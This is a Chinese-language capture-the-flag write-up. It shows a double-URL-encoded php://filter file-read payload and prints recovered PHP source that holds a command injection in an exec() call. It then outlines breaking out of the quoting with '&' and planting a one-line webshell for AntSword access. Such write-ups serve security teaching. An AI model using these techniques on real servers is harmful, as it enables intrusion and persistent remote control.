审题
看到url,可以想到伪协议读取
尝试过后可以发现,题目绕过了read后面的编码
我们可以尝试双重urlencode进行绕过
?file=php://filter/read=%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=GWHT.php
解密出来代码为
<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>count is here</title><style>html,body {overflow: none;max-height: 100vh;}</style>
</head><body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;"><center><img src="question.jpg" height="200" width="200" /> </center><?phpini_set('max_execution_time', 5);if ($_COOKIE['pass'] !== getenv('PASS')) {setcookie('pass', 'PASS');die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');}?><h1>A Counter is here, but it has someting wrong</h1><form><input type="hidden" value="GWHT.php" name="file"><textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br /><input type="submit"></form><?phpif (isset($_GET["count"])) {$count = $_GET["count"];if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){die('hacker!');}echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";}?></body></html>
当然我们现在还不知道要传啥Cookie,我们到robots.txt里面看看
发现有一个文件
同样,我们也可以伪协议进行读取
发现Cookie要为GWHT,其实可以猜到
然后我们可以看到搜索框,
由我们的代码可以知道有绕过
<?phpif (isset($_GET["count"])) {$count = $_GET["count"];if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){die('hacker!');}echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
只不过绕的不太全。
我们可以进行尝试绕过,只要绕过单引号就行,然后使用&字符进行同时执行。其编码为%26.
看到可以返回最后一个文件,所以我们可以注入一句话木马。
将木马传入2.php中配合蚁剑进行查看env得到flag。